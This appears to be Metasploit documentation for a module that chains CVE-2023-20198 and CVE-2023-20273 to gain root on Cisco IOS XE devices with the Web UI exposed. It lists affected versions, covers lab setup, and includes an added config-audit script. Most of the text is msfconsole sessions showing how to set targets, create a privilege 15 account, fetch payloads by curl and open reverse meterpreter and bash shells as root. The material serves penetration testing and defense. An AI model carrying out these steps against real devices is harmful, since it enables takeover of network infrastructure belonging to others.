## Vulnerable Application
This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE
devices which have the Web UI exposed. An attacker can execute a payload with root privileges.
The vulnerable IOS XE versions are:
16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
17.11.99SW
NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even
though its IOS XE version indicates it should be vulnerable to CVE-2023-20273.
## Testing
This module was tested against IOS XE version 16.12.3 and version 17.3.2 running on a CSR1000v appliance.
To test this module you will need to either:

* Acquire a hardware device running one of the vulnerable firmware versions listed above.

Or

* Set up a virtualized environment.
    * A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
      can be virtualized using [GNS3](https://www.gns3.com/) and VMware Workstation/Player. Follow the
      [Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows) to install GNS3 and the
      [topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn how GNS3 can be used.
    * A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
    * When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
    * Create a new CSR1000v instance as a QEMU device.
    * The CSR1000v device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter was bridged
      to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
      be accessible to a remote attacker.
    * When the virtual router has booted up, you must enable the vulnerable WebUI component. From a serial console on
      the device:
      ```
      Router>enable
      Router#config
      Router(config)#ip http server
      Router(config)#ip http secure-server
      Router(config)#ip http authentication local
      Router(config)#username admin privilege 15 secret qwerty
      Router(config)#exit
      Router#copy running-config startup-config
      ```
    * You should now be able to access the WebUI via https://TARGET_IP_ADDRESS/webui and log in with admin:qwerty
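
The lab steps above switch the Web UI on with `ip http server` and `ip http secure-server` and add a local privilege 15 account. As an added example (not part of the Metasploit module or the original documentation), the following Python audits a saved running-config for exactly those settings. The function names, the approved-account list and both sample configurations are constructed for illustration, and the audit assumes the config states the `ip http` lines explicitly.

```python
import re

# Constructed sample: the lab configuration from the setup steps above as it
# could appear in a saved running-config (the secret hash is a placeholder).
LAB_CONFIG = """\
hostname Router
!
username admin privilege 15 secret 9 $9$PLACEHOLDER
!
ip http server
ip http authentication local
ip http secure-server
!
"""

# Constructed sample: the same device with both Web UI listeners switched off.
HARDENED_CONFIG = """\
hostname Router
!
username admin privilege 15 secret 9 $9$PLACEHOLDER
!
no ip http server
no ip http secure-server
!
"""

USER_RE = re.compile(r"^username\s+(\S+)\s+privilege\s+15\b")


def audit_running_config(text):
    """Return findings about Web UI exposure in a running-config."""
    http = {"ip http server": False, "ip http secure-server": False}
    acl_bound = False
    priv15_users = []
    for raw in text.splitlines():
        line = raw.strip()
        negated = line.startswith("no ")
        cmd = line[3:] if negated else line
        if cmd in http:
            http[cmd] = not negated  # the last explicit statement wins
        elif line.startswith("ip http access-class "):
            acl_bound = True  # an ACL limits who can reach the HTTP server
        else:
            match = USER_RE.match(line)
            if match:
                priv15_users.append(match.group(1))
    listeners = sorted(name for name, on in http.items() if on)
    return {
        "webui_listeners": listeners,
        "webui_exposed": bool(listeners),
        "acl_restricted": acl_bound,
        "priv15_users": priv15_users,
    }


def unexpected_admins(findings, approved):
    """Privilege 15 accounts that are not on the operator's approved list."""
    return [u for u in findings["priv15_users"] if u not in approved]


if __name__ == "__main__":
    for name, cfg in (("lab", LAB_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_running_config(cfg))
```

Run it against periodic config backups: a listener that appears without a change ticket, or a privilege 15 name missing from the approved list, is worth investigating.
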
## Verification Steps
1. Start msfconsole
2. `use exploit/linux/misc/cisco_ios_xe_rce`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set target 0`
5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
6. `check`
7. `exploit`
## Options
### CISCO_VRF_NAME
We allow a user to specify the VRF name used to route traffic for the payload's network transport. The default of
'global' should work, but exposing this as an option will allow for usage in more complex network setups.
A user could leverage the auxiliary module `auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198` to
inspect a device's configuration to see an appropriate VRF to use.
### CISCO_CMD_TIMEOUT
We may need to try and execute a command a second time if it fails the first time. This option is the maximum
number of seconds to keep trying.
## Scenarios
To support a broad set of available payloads, we support both a Linux target and a Unix Target (IOS XE is Linux based).
This allows for native Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
### Linux Command (IOS XE 17.3.2)
```
msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.113
RHOSTS => 192.168.86.113
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 0
target => 0
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > show options

Module options (exploit/linux/misc/cisco_ios_xe_rce):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.113   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              443              yes       The target port (TCP)
   SSL                true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                               no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           eth0             yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_FILELESS is false:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      vsLOEPPqU        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux Command


View the full module info with the info, or info -d command.

msf exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.113:443 - The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'vTakCDWG' with password 'RJQHKnKK'
[*] Removing user 'vTakCDWG'
[*] Sending stage (3045380 bytes) to 192.168.86.113
[*] Meterpreter session 5 opened (192.168.86.122:4444 -> 192.168.86.113:56702) at 2025-03-03 20:31:39 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : testc100v
OS : (Linux 4.19.106)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
```
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
payload => cmd/linux/http/x64/shell/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'VltpvRrx' with password 'KDJGXORf'
[*] Removing user 'VltpvRrx'
[*] Sending stage (38 bytes) to 192.168.86.113
[*] Command shell session 6 opened (192.168.86.122:4444 -> 192.168.86.113:56736) at 2025-03-03 20:32:52 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux testc100v 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.113 - Command shell session 6 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) >
```
### Linux Command (IOS XE 16.12.3)
```
msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.114
RHOSTS => 192.168.86.114
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > show options

Module options (exploit/linux/misc/cisco_ios_xe_rce):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.114   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              443              yes       The target port (TCP)
   SSL                true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                               no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           eth0             yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_FILELESS is false:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      UoDekiVI         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux Command


View the full module info with the info, or info -d command.

msf exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.114:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'XpJaBQIt' with password 'qEBrzlDh'
[*] Removing user 'XpJaBQIt'
[*] Sending stage (3045380 bytes) to 192.168.86.114
[*] Meterpreter session 7 opened (192.168.86.122:4444 -> 192.168.86.114:61922) at 2025-03-03 20:34:05 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : test2_c1000v
OS : (Linux 4.19.64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
```
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 0
target => 0
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
payload => cmd/linux/http/x64/shell/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'vmoCbNcA' with password 'UgDnLaCG'
[*] Removing user 'vmoCbNcA'
[*] Sending stage (38 bytes) to 192.168.86.114
[*] Command shell session 8 opened (192.168.86.122:4444 -> 192.168.86.114:61940) at 2025-03-03 20:34:58 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux test2_c1000v 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.114 - Command shell session 8 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) >
```
### Unix Target (IOS XE 17.3.2)
```
msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.113
RHOSTS => 192.168.86.113
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 1
target => 1
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'edGjwUsF' with password 'hhOLNNrX'
[*] Removing user 'edGjwUsF'
[*] Sending stage (24772 bytes) to 192.168.86.113
[*] Meterpreter session 9 opened (192.168.86.122:4444 -> 192.168.86.113:56770) at 2025-03-03 20:36:00 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : testc100v
OS : Linux 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020
Architecture : x64
Meterpreter : python/linux
meterpreter >
```
```
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'mXsKBwvG' with password 'gCUirrkj'
[*] Removing user 'mXsKBwvG'
[*] Command shell session 10 opened (192.168.86.122:4444 -> 192.168.86.113:56802) at 2025-03-03 20:36:39 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux testc100v 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.113 - Command shell session 10 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) >
```
### Unix Target (IOS XE 16.12.3)
```
msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.114
RHOSTS => 192.168.86.114
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 1
target => 1
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > show options

Module options (exploit/linux/misc/cisco_ios_xe_rce):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.114   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              443              yes       The target port (TCP)
   SSL                true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                               no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  eth0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Unix Command


View the full module info with the info, or info -d command.

msf exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.114:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'vhQbLuix' with password 'JAjuUVov'
[*] Removing user 'vhQbLuix'
[*] Sending stage (24772 bytes) to 192.168.86.114
[*] Meterpreter session 11 opened (192.168.86.122:4444 -> 192.168.86.114:61966) at 2025-03-03 20:37:36 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : test2_c1000v
OS : Linux 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019
Architecture : x64
Meterpreter : python/linux
meterpreter >
```
```
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'JJgILIEn' with password 'EkMpGWih'
[*] Removing user 'JJgILIEn'
[*] Command shell session 12 opened (192.168.86.122:4444 -> 192.168.86.114:61982) at 2025-03-03 20:38:16 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux test2_c1000v 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.114 - Command shell session 12 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) >
```